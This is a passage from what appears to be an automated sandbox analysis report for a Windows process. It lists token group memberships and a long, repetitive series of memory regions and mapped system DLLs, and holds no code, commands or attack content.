"CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1756 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1757 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1758 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1759 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1760 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1761 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1762 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1763 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1764 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1844 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1845 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1846 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 1847 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 1848 start_va = 0x660000 end_va = 0x66ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 1849 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1850 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1851 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1852 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1853 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1854 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1855 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1856 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1857 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1858 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1859 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1860 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1861 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1862 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1863 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1864 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1865 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1886 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1887 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1888 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 1889 start_va = 0x670000 end_va = 0x126ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1890 start_va = 0x1270000 end_va = 0x13affff entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 1891 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1892 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1893 start_va = 0x13b0000 end_va = 0x147ffff entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 1894 start_va = 0x1480000 end_va = 0x174efff entry_point = 0x1480000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1934 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1935 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2059 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2060 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 2061 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 2062 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2063 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2064 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2065 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2066 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2067 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2068 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2069 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2070 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2071 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2072 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2073 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2074 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2075 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2076 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2077 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2078 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2079 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2080 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2081 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2082 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2083 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2084 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2085 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2086 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2087 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2088 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2089 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2090 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2091 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2092 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2093 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2094 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2095 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2096 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2097 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2098 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2099 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2100 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2101 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2102 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2103 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2104 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2105 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2106 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2107 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2108 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2109 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2110 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2111 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2112 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 2113 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 2114 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2115 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2116 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2117 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2118 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2119 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2120 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2121 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2122 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2123 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2124 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2125 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2126 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2127 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2128 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2129 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2130 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2131 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2132 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2133 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2136 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2137 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2138 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2139 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2140 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2141 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2142 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2143 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2144 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2145 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2146 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2147 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2148 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2149 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2150 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2151 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2152 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2153 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2154 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2155 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2156 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2157 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2158 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2159 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2160 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2161 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2162 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2163 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2164 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2165 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2166 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2167 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2168 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2169 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2170 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2171 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2172 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2288 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2289 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 2290 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 2291 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2292 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2293 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2294 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2295 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2296 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2297 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2298 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2299 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2300 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2301 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2302 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2303 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2304 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2305 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2306 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2307 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2308 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2309 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2310 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2311 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2312 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2313 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2314 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2315 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2316 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" 